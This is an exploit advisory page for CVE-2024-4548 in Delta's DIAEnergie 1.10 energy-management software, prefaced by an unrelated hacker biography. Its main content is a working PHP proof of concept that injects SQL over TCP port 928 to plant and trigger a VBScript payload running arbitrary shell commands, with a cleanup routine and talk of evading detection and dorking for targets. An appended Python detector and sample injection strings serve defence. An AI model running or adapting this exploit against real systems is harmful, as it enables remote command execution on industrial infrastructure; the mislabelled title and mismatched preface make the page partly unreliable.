Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


=============================================================================================================================================
| # Title : DIAEnergie 1.10 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: The code attempts to establish a connection with the targeted server over the network (TCP port 928, see the PoC below).

If the connection succeeds, it sends a malicious SQL query that injects commands into the database.

After the injection, the script cleans the logs so that the attack is not easily detected.

( https://packetstorm.news/files/id/180334/ CVE-2024-4548 )

[+] save code as poc.php.

[+] Set Target : line 114

[+] Usage : php poc.php

[+] Payload :

<?php

class CustomSQLInjection
{
    const TARGET_PORT = 928;
    const TARGET_HOST = 'target_host'; // set the target host here before running

    private $payload;

    public function __construct($cmd)
    {
        // VBScript payload stored in the DIAE_script table and run by the service
        $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
    }

    public function check()
    {
        try {
            // The service answers 'Who is it?' with a banner containing its version
            $sock = $this->connect();
            fwrite($sock, 'Who is it?');
            $res = fread($sock, 1024);
            fclose($sock);

            if (empty($res)) {
                echo "Received an empty response.\n";
                return 'Unknown';
            }

            echo "Who is it response: $res\n";

            preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);

            if (empty($version)) {
                return 'Detected';
            }

            echo "Version retrieved: " . $version[0] . "\n";

            // Builds newer than 1.10.1.8610 are treated as fixed
            if (version_compare($version[0], '1.10.1.8610', '>')) {
                return 'Safe';
            }

            return 'Appears';

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            return 'Unknown';
        }
    }

    public function exploit()
    {
        // Inject the payload and trigger its execution
        $this->execute_command($this->payload);
    }

    private function execute_command($cmd)
    {
        $scname = bin2hex(random_bytes(rand(5, 10)));

        echo "Using random script name: $scname\n";

        // Random YYYY-MM-DD date used for the recalculation window
        $random_date = sprintf('%04d-%02d-%02d', rand(2024, 2026), rand(1, 12), rand(1, 29));
        echo "Using random date: $random_date\n";

        $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
        echo "Using random time: $random_time\n";

        try {
            echo "Sending SQL injection...\n";

            // The fourth, integer-typed field of RecalculateHDMWYC is concatenated
            // into SQL; closing the expression lets an INSERT into DIAE_script follow
            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Injection - Expected response received: $res\n";

            fclose($sock);

            // Trigger the script execution
            echo "Triggering script execution...\n";
            $sock = $this->connect();
            fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
            $res = fread($sock, 1024);

            if ($res !== 'Recalculate Script Start!') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Trigger - Expected response received: $res\n";

            fclose($sock);

            echo "Script successfully injected, check thy shell.\n";

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            $this->cleanup($scname);
        }
    }

    private function cleanup($scname)
    {
        echo "Cleaning up database...\n";
        try {
            // Same injection point, this time removing the inserted DIAE_script row
            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Cleanup - Expected response received: $res\n";
            fclose($sock);

        } catch (Exception $e) {
            echo "Error during cleanup: " . $e->getMessage() . "\n";
        }
    }

    private function connect()
    {
        // Open a plain TCP socket to the service with a 10 second timeout
        $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
        if (!$sock) {
            throw new Exception("Connection failed: $errstr ($errno)");
        }
        return $sock;
    }
}

// Command to run on the target
$cmd = 'dir'; // replace with the command you want executed
$exploit = new CustomSQLInjection($cmd);
$exploit->check();
$exploit->exploit();

?>
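A defender-side companion to the PoC above, added here and not part of the original advisory. It parses the tilde-delimited Recalculate requests the service accepts on port 928, flags any request whose datetime or integer fields carry anything other than the expected grammar (the injection rides in the trailing integer field), and mirrors the version threshold the PoC's check() uses. The request lines are constructed samples, not captured traffic; the regexes are assumptions derived from the messages shown in the PoC.

```python
import re
from typing import List, Optional, Tuple

# Request shape seen in the PoC: <Command>~<start datetime>~<end datetime>~<integer>
REQUEST_RE = re.compile(
    r"^(?P<cmd>Recalculate\w+)~(?P<start>[^~]*)~(?P<end>[^~]*)~(?P<n>.*)$", re.S
)
DATETIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")
# Tokens that never belong in a date or integer field of this protocol
SQL_HINT_RE = re.compile(r";|--|/\*|\bDIAE_script\b|\b(?:INSERT|DELETE|UPDATE|EXEC)\b", re.I)

# Builds newer than this one are treated as fixed in the PoC's check() routine
FIXED_AFTER: Tuple[int, ...] = (1, 10, 1, 8610)


def is_patched(version: str) -> bool:
    """True when a dotted version string from the 'Who is it?' banner is newer than FIXED_AFTER."""
    return tuple(int(p) for p in version.split(".")) > FIXED_AFTER


def classify_request(msg: str) -> Optional[str]:
    """Return a reason string when a Recalculate request breaks the field grammar, else None."""
    m = REQUEST_RE.match(msg)
    if not m:
        return None  # not a Recalculate request; outside this rule's scope
    for name in ("start", "end"):
        if not DATETIME_RE.match(m.group(name)):
            return f"{name} field is not a plain datetime: {m.group(name)[:40]!r}"
    tail = m.group("n")
    if tail.isdigit():
        return None
    hint = SQL_HINT_RE.search(tail)
    if hint:
        return f"SQL fragment in integer field (matched {hint.group(0)!r}): {tail[:60]!r}"
    return f"integer field is not numeric: {tail[:40]!r}"


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Run classify_request over captured request lines; return (index, reason) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        reason = classify_request(line.rstrip("\n"))
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample requests, one per line, as a capture tool might dump them
SAMPLE_REQUESTS = [
    "Who is it?",
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script) VALUES(N'x', N'y');--",
    "RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
]

if __name__ == "__main__":
    for idx, why in scan_lines(SAMPLE_REQUESTS):
        print(f"line {idx}: {why}")
```

A RecalculateScript request arriving shortly after a flagged RecalculateHDMWYC from the same client is the trigger step, so correlating the two in a SIEM rule is worthwhile.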

Greetings to :
===================================================================================================
| jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
===================================================================================================